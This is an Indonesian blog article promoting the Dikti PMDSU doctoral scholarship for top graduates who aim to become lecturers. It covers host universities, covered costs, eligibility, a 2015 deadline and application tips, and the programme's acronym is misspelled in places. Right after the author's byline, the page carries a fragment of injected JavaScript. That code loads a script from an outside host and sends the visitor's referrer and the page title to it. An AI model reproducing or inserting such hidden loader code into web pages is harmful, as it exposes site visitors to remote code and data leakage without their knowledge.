Artikel Beasiswa Dalam Negeri Berita Infografis Informasi Beasiswa

“BERCITA – CITA MENJADI DOSEN?” INI JALANMU, KAWAN…!

beasiswa_lagi

“Teman – teman, ada kabar gembira nih!”

Spesial buat kamu lulusan sarjana (S1) terbaik (fresh graduated) di NKRI yang mau menjadi dosen, ada kabar gembira. Langsung aja yah, kabar gembiranya adalah Direktorat Jenderal Pendidikan Tinggi (Dikti) menawarkan beasiswa PSDMU.

“Apa sih beasiswa PSDMU?”

PSDMU adalah Program Beasiswa Pendidikan Magister Menuju Doktor untuk Sarjana Unggul. So, buat kamu yang ngaku sarjana terbaik, cobalah dan buktikan kamu mampu dan berhak menerima beasiswa ini.

“Perguruan Tinggi atau universitas mana yang menyelenggarakan beasiswa PSDMU?”

So pasti PT atau Univ yang kece seperti Institut Pertanian Bogor, Institut Teknologi Bandung, Universitas Airlangga, Universitas Andalas, Universitas Diponegoro, Universitas Sriwijaya, Institut Teknologi Sepuluh Nopember, dan Universitas Sumatera Utara. Sok dipilih, mau ke universitas mana kawan. Pilih satu aja yah.

“Apakah keistimewaan dari beasiswa PSDMU?”

Keistimewaannya adalah jika diterima, kamu langsung menandatangi kontrak dengan Dikti sebagai calon dosen. Selain itu, kamu bisa menempuh Pendidikan S3  tanpa harus menjalani pendidikan magister terlebih dahulu dengan bimbingan promotor yang nantinya kamu usulkan saat pendaftaran.

“Biaya apa aja yang ditanggung?”

Pembiayaan beasiswa PMDSU di antaranya meliputi biaya riset di kelompok peneliti/promotor (maksimum Rp 60 juta/per tahun), outsourcing fasilitas riset di dalam dan luar negeri, biaya seminar, biaya pendidikan (SPP/UKT), biaya hidup dan tunjangan mahasiswa, dan biaya administrasi.

Oh yah, sebelum mendaftar pastikan kamu memenuhi persyaratan umum yaitu lulus S1 dalam tiga tahun terakhir dengan IPK minimum 3,25. Yuk, daftar sekarang melalui beasiswa.dikti.go.id/pmsdu. Deadline bentar lagi loh (18 Juli 2015).

Tips sebelum mendaftar PMDSU

Ketika mendaftar kamu akan disuruh memilih promotor atau pembimbing. Baiknya, sebelum mendaftar kamu membangun komunikasi dengan calon promotor tersebut. Pastikan beliau bersedia menjadi promotor kamu. Pedekate dari sekarang yah, guys.

Sebelum mendaftar PMDSU, pastikan kamu sudah mendaftar ke program pascasarjana (PPs) universitas tujuan.

Oh yah, pastikan juga kamu benar – benar berkomitmen menjadi dosen. Jika nanti kamu lolos namun mengundurkan diri ditengah jalan akan didenda sebanyak dua kali lipat dari uang beasiswa yang telah kamu terima.

Untuk informasi lebih lanjut klik aja http://beasiswa.dikti.go.id/pmdsu/

Good luck and be the lecturer!!!

Penulis : Jenny Rahayu A. S.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About the author

Admin

teacher, blogger, entrepreneurship